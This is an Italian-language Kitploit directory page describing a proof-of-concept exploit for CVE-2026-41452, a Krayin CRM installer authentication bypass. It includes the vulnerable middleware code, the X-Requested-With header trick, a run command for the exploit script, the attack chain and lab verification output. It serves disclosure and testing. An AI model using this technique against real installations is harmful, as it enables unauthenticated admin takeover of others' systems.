Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-41452-PoC — CVE-2026-41452 — Bypass non autenticato dell'installer di Krayin CRM (X-Requested-With) → acquisizione dell'account admin. Verificato: sovrascrittura + login su 2.2.4, bloccato su 2.2.5 | Kitploit
Strumenti/GitHubGitHub/boreas37/cve-2026-41452-poc
Autenticazione e AutorizzazioneAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubboreas37/cve-2026-41452-poc

CVE-2026-41452-PoC

CVE-2026-41452 — Bypass non autenticato dell'installer di Krayin CRM (X-Requested-With) → acquisizione dell'account admin. Verificato: sovrascrittura + login su 2.2.4, bloccato su 2.2.5

Vedi Repository
37 giorni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-41452 — Bypass dell'autenticazione dell'installer di Krayin CRM → Compromissione dell'admin

CVSS 9.8 (Critico) · CWE-287 / CWE-306 · Report di Jiva · VulnCheck

Riepilogo

L'installer di Krayin CRM espone POST /install/api/admin-config-setup (più run-migration, run-seeder) senza protezione CSRF (gruppo withoutMiddleware('web')). Il middleware globale CanInstall blocca la rotta solo per le richieste non-AJAX:

root@kitploit:~
// app/Http/Middleware/CanInstall.php
if ($this->isAlreadyInstalled() && ! $request->ajax()) {
    return redirect()->route('admin.dashboard');
}

L'invio di X-Requested-With: XMLHttpRequest salta interamente il controllo. Il controller esegue quindi un updateOrInsert sull'admin primario hardcoded (user id=1) con nome/email/password forniti dall'attaccante (role_id=1, status=1) → compromissione totale dell'admin senza autenticazione su un'istanza già installata.

Versioni affette: ≤ 2.2.0 e 2.2.4 (regressione). Corretta in 2.2.1 (e4eb96f5), regressione in 2.2.4 (6a7bc4cc), nuovamente corretta in 2.2.5 (ea4919a8). master era ancora vulnerabile al momento della ricerca.

Exploit

root@kitploit:~
python3 poc_cve-2026-41452.py http://TARGET newadmin [email protected] 'NewPass@123'

Catena:

  1. Baseline: POST non-AJAX → bloccato (redirect 302) — dimostra che il middleware funziona per le richieste normali
  2. POST AJAX X-Requested-With: XMLHttpRequest → HTTP 200 1 → admin (id=1) sovrascritto
  3. Accedi a /admin/login con le nuove credenziali → reindirizzamento a /admin/dashboard
  4. La dashboard viene renderizzata → compromissione confermata

Verifica (2026-08-12, laboratorio Docker, ARM64)

root@kitploit:~
[0] NON-AJAX POST -> HTTP 302 (blocked by CanInstall)        [OK control]
[1] AJAX POST /install/api/admin-config-setup -> HTTP 200 '1' [OK overwrite]
[2] login [email protected] -> HTTP 302 /admin/dashboard          [OK]
[3] GET /admin/dashboard -> HTTP 200 (full dashboard)          [OK]
=== VERDICT: CVE-2026-41452 EXPLOITABLE ===

Confronto con la build corretta: con i file v2.2.5 la stessa POST AJAX → HTTP 403 (bloccata).

Impatto

Qualsiasi installazione Krayin CRM raggiungibile pubblicamente (v2.2.4 o ≤2.2.0) può essere completamente compromessa da un attaccante non autenticato con una singola richiesta. Nessun CSRF, nessuna credenziale, nessuna interazione richiesta.

Riferimenti

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-41452
  • Report di Jiva Security: https://jivasecurity.com/writeups/krayin-installer-bypass-account-takeover-cve-2026-41452
  • Advisory VulnCheck: https://www.vulncheck.com/advisories/krayin-crm-missing-authentication-via-install-api-admin-config-setup
  • Fix: ea4919a8 (v2.2.5) · Regressione: 6a7bc4cc (v2.2.4) · Primo fix: e4eb96f5 (v2.2.1)
Scarica lo strumento